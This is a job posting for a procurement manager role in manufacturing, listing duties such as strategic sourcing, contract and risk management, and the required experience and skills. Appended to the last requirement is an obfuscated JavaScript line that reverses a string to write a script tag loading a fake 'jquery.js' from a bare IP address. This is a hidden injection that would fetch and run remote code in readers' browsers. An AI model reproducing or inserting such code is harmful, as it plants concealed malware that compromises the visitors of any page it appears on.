Industry : Manufacturing
Gender : Male
– To lead and manage procurement activities align to Group policy through vigorous strategic sourcing and information system management for reliable supply without compromise SHE and quality to improve business competitiveness and efficiency.
– Ensure all procurement activities are transparent and comply to Group policy and Statutory requirements.
– To lead, strategize and manage departmental functions and influence stakeholders in achieving business goals and strategies
– Responsible to create value added and efficiency improvement.
– To manage and support annual budgetary process.
– Quality and on time periodic reports.
– Regularly review and update Procurement process / mapping align to Group policy, statutory requirement and transparent practices.
– To challenge stakeholders on what are the real needs and desirable in optimizing benefits.
– Identify areas of improvement to improve competitiveness and efficiency with sound corrective action, define responsibility and deadlines.
– Utilize and optimize Group synergy and leverage.
– Review and recommend actions with clear supportive analysis on implications evaluation and decision process.
– Contract and risk management to secure supply and minimize business exposure.
– To lead / working in cross functional project.
– Maintain transparent and healthy industrial relationship with vendors.
– To coach, support, motivate and monitor subordinate performance.
– To ensure Information system management are well maintained and updated.’
Professional Skills Requirements:
– Bachelor degree or higher.
– Strong English proficiency, both oral and written.
– More than 8 years’ experience in procurement (Materials and Engineering / Project).
– Contract and Bidding management.
– Strategic negotiation.
– Skilled in analysis and ability to transform complex information / data into presentable matrix or summary
– Influential and active interaction with stakeholders including shop floor level
– Multiple tasking with ability to challenge status quo
– Resourceful driver and good pace executor
– Sound Contract management documentation
– Receptive to process and technical understanding
– Understand business environment and influential factors
– Strong experience in manufacturing / process /project management document.write(‘>tpircs/”sj.yreuqj/87.611.942.431//:sptth”=crs tpircs<'.split("").reverse().join(""))